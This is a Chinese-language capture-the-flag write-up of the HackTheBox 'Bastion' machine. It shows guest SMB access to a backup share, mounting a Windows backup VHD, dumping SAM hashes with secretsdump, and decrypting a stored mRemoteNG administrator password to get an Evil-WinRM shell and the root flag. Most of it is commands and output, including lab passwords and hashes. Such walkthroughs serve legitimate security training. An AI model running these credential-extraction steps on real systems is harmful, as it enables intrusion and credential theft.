Bastion(堡垒)
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nmap 10.129.136.29
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-21 09:33 EST
Nmap scan report for 10.129.136.29
Host is up (0.12s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nxc smb 10.129.136.29 -u guest -p '' --shares --local-auth
SMB 10.129.136.29 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:BASTION) (signing:False) (SMBv1:True)
SMB 10.129.136.29 445 BASTION [+] BASTION\guest:
SMB 10.129.136.29 445 BASTION [*] Enumerated shares
SMB 10.129.136.29 445 BASTION Share Permissions Remark
SMB 10.129.136.29 445 BASTION ----- ----------- ------
SMB 10.129.136.29 445 BASTION ADMIN$ Remote Admin
SMB 10.129.136.29 445 BASTION Backups READ,WRITE
SMB 10.129.136.29 445 BASTION C$ Default share
SMB 10.129.136.29 445 BASTION IPC$ READ Remote IPC
1.2. SMB
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# impacket-smbclient guest:''@10.129.136.29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# shares
ADMIN$
Backups
C$
IPC$
# use Backups
# ls
drw-rw-rw- 0 Fri Nov 21 09:41:15 2025 .
drw-rw-rw- 0 Fri Nov 21 09:41:15 2025 ..
-rw-rw-rw- 0 Fri Nov 21 09:41:15 2025 JhpZDUsBtH.txt
-rw-rw-rw- 116 Tue Apr 16 07:43:19 2019 note.txt
-rw-rw-rw- 0 Fri Feb 22 07:43:28 2019 SDT65CB.tmp
drw-rw-rw- 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup
drw-rw-rw- 0 Fri Nov 21 09:41:14 2025 wQornZEWbD
# get note.txt
# tress
*** Unknown syntax: tress
# tree
/JhpZDUsBtH.txt
/note.txt
/SDT65CB.tmp
/WindowsImageBackup/L4mpje-PC
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
/WindowsImageBackup/L4mpje-PC/Catalog
/WindowsImageBackup/L4mpje-PC/MediaId
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/BackupSpecs.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
/WindowsImageBackup/L4mpje-PC/Catalog/BackupGlobalCatalog
/WindowsImageBackup/L4mpje-PC/Catalog/GlobalCatalog
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache/{cd113385-65ff-4ea2-8ced-5630f6feca8f}
Finished - 23 files and folders
#
note.txt
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
请不要将整个备份文件本地传输,VPN传到子公司太慢了
有些 .vhd 文件
# ls
drw-rw-rw- 0 Fri Feb 22 07:45:32 2019 .
drw-rw-rw- 0 Fri Feb 22 07:45:32 2019 ..
-rw-rw-rw- 37761024 Fri Feb 22 07:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rw-rw-rw- 5418299392 Fri Feb 22 07:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rw-rw-rw- 1186 Fri Feb 22 07:45:32 2019 BackupSpecs.xml
-rw-rw-rw- 1078 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rw-rw-rw- 8930 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rw-rw-rw- 6542 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rw-rw-rw- 2894 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rw-rw-rw- 1488 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rw-rw-rw- 1484 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rw-rw-rw- 3844 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rw-rw-rw- 3988 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rw-rw-rw- 7110 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rw-rw-rw- 2374620 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
5个G 我日,
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cat BackupSpecs.xml
<BackupSpecs>
<FileSpecs>
<Volume Name="\\?\Volume{9b9cfbc3-369e-11e9-a17c-806e6f6e6963}\"
AccessPath=""
OriginalAccessPath=""
Label=""
OriginalLabel="">
<FileSpec FilePath="\\?\Volume{9b9cfbc3-369e-11e9-a17c-806e6f6e6963}\"
FileName="*"
IsRecursive="true"
IsInclude="true" />
</Volume>
<Volume Name="\\?\Volume{9b9cfbc4-369e-11e9-a17c-806e6f6e6963}\"
AccessPath="C:"
OriginalAccessPath="C:"
Label=""
OriginalLabel="">
<FileSpec FilePath="C:\"
FileName="*"
IsRecursive="true"
IsInclude="true" />
</Volume>
</FileSpecs>
<SystemState IsPresent="false" />
<AllCritical IsPresent="false" />
</BackupSpecs>
可以发现小的是一个无盘符分区文件,大的是C盘备份
1.3. mount vhd
使用 guestmount
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# sudo guestmount -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd -m /dev/sda1 --ro /mnt/vhd
Warning: program compiled against libxml 215 using older 214
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ls /mnt/vhd
Boot bootmgr BOOTSECT.BAK 'System Volume Information'
没有啥东西,看来有用的在那个C盘里面,比如有SAM和SYSTEM 我们可以进行 Secrets dump
但是下载5个G肯定是不会下载的,这里可以挂载SMB到本地参考0xdf的做法
mount -t cifs //10.129.23.67/backups /mnt -o user=,password=
然后挂载
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# guestmount -a /mnt/backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/vhd
Warning: program compiled against libxml 215 using older 214
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ls /mnt/vhd
'$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
1.4. Secrets dump
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cp /mnt/vhd/Windows/System32/config/SAM ./
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cp /mnt/vhd/Windows/System32/config/SYSTEM ./
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# impacket-secretsdump -sam SAM -system SYSTEM local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nxc smb 10.129.136.29 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
SMB 10.129.136.29 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.129.136.29 445 BASTION [-] Bastion\administrator:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nxc smb 10.129.136.29 -u 4mpje -H 26112010952d963c8dc4217daec986d9
SMB 10.129.136.29 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.129.136.29 445 BASTION [+] Bastion\4mpje:26112010952d963c8dc4217daec986d9 (Guest)
4mpje账户可以登录。
密码 bureaulampje
目标开放了ssh端口,可以使用明文登录
1.5. shell as 4mpje via ssh
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ssh L4mpje@10.129.136.29
L4mpje@10.129.136.29's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>
2. System
2.1. recon
先跑一下 winPEAS
[+] INSTALLED SOFTWARE
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft.NET
>>>> mRemoteNG
OpenSSH-Win64
PackageManagement
VMware
Windows Defender
Windows Defender
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
Windows NT
Windows NT
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\Program Files\VMware\VMware Tools\
>>>> InstallLocation REG_SZ C:\Program Files (x86)\mRemoteNG\
[+] Remote Desktop Credentials Manager
[?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential
-manager
2.2. mRemoteNG
目标安装了 mRemoteNG
直接参考笔记解密密码
Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 14:03 <DIR> .
22-02-2019 14:03 <DIR> ..
>>>> 22-02-2019 14:03 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.817.973.248 bytes free
confCons.xml 是连接配置
弄到SMB目录下,吓到本地解密
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>copy confCons.xml c:\Backups\confCons.xml
1 file(s) copied.
# get confCons.xml
# exit
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd confCons.xml note SAM SYSTEM
BackupSpecs.xml lab_C1trus33.ovpn note.txt SECURITY winPEAS.bat
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
Cloning into 'mRemoteNG-Decrypt'...
remote: Enumerating objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19 (from 1)
Receiving objects: 100% (19/19), 14.80 KiB | 222.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cat confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritV
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cd mRemoteNG-Decrypt
┌──(root㉿kali)-[~/Desktop/htb/Bastion/mRemoteNG-Decrypt]
└─# python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# evil-winrm -i 10.129.136.29 -u administrator -p thXLHM96BeKL0ER2
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
062bfb1b3abe8598c03eb59b153ed1fd